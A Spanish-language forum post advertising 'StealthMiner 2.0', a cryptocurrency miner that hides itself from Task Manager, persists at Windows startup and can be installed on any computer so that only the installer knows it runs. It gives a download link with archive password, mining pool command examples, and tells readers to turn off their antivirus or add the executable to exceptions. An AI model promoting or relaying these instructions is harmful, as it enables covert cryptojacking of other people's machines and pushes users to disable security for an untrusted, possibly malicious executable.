Minergate Forum

Forum of the best Mining Pool ever.

StealthMiner 2.0

Moderators: ikanunaki, Janika, JaneMurphy, Ar1k88, DanteSama, Dossis, tykari

daxian
Posts: 81
Joined: Sun Sep 17, 2017 2:47 pm

StealthMiner 2.0

Postby daxian » Sat Aug 22, 2020 8:07 am

StealthMiner 2.0 es el ÚNICO programa de minería de criptomonedas que le permite actualmente extraer 6 de las mejores criptomonedas en MODO DE SIGILO COMPLETO utilizando GPU y CPU a un nivel de rendimiento que no afecta el uso diario de su computadora.

CARACTERÍSTICAS de StealthMiner 2.0:
Completa Stealth Miner para que no se note que se ejecuta en segundo plano. No se muestra en los programas en ejecución. SÓLO usted sabe que el minero está corriendo. Puede ejecutarlo en varias computadoras.
Cambie automáticamente entre 6 monedas para extraer según la rentabilidad
Inicio inteligente al iniciar Windows. El programa comienza a minar 5 minutos después del arranque para evitar cualquier ralentización
La extracción de GPU y CPU se basa en la actividad de la computadora. El programa ajusta automáticamente la potencia de extracción para que su computadora nunca se ralentice y sin embargo extraiga la mayor cantidad de monedas posible. Si su computadora está encendida y funcionando, utilizará más recursos, etc.
Configuración sencilla. Todo lo que necesita hacer es abrir un archivo de texto y copiar más allá de la dirección del grupo y la dirección de la billetera de sus monedas y estará listo para comenzar.

Cómo instalar StealthMiner 2.0:

1, descargue la última versión de StealthMiner: https://yadi.sk/d/Y_mXKg3A-EZH4A PASS 12345
2, descomprime el Rar en una carpeta
3, abra el archivo autorun.txt y escriba su dirección y contraseña después de las líneas de comando que ve. NO BORRE LAS LÍNEAS DE COMANDO. Puede insertar una línea para cada moneda o las monedas que desee extraer. El programa sabrá qué extraer en función de los servidores de grupo que guarde.
Ejemplo para Monero: -o estrato + tcp: //mine.moneropool.com: 3333 -u YOUR_WALLET_ADDRESS -p x
Ejemplo para Ethereum: us1.ethermine.org:4444 -u YOUR_WALLET_ADDRESS -p x
4, simplemente GUARDE el archivo como está.
5. Ejecute StealthMinerInstaller.exe: su antivirus probablemente dirá que es un virus, apague el antivirus o ejecútelo como administrador o agréguelo a las excepciones de antivirus. Todos los mineros reciben una advertencia de virus, así es como es.
6, TENGA MUCHO CUIDADO Y ASEGÚRESE DE HACER CLIC EN LAS COSAS DE LA MANERA QUE ESTÁN AQUÍ
7, PRIMERO haga clic en Instalar claves; esto asegurará que el software se inicie en el arranque; una vez que reciba el mensaje de éxito, continúe.
8, AHORA haga clic en Ejecutar instalación; esto instalará el minero; verá el mensaje de que ha comenzado a minar con éxito.

Estas listo. ha comenzado a minar. Podrá verificar el saldo de su billetera y ver cómo se acumulan sus monedas.

Descripción:

StealthMiner es actualmente el ÚNICO minero que se puede instalar con 1 clic y minar en modo sigiloso completo para que nadie pueda ver el programa en ejecución. Abra el administrador de tareas y vaya a programas en ejecución y no vea completamente nada. Instale esto en cualquier computadora con Windows y solo usted sabrá que hay un minero instalado.

Return to “Spanish Forum”

Who is online

Users browsing this forum: No registered users and 3 guests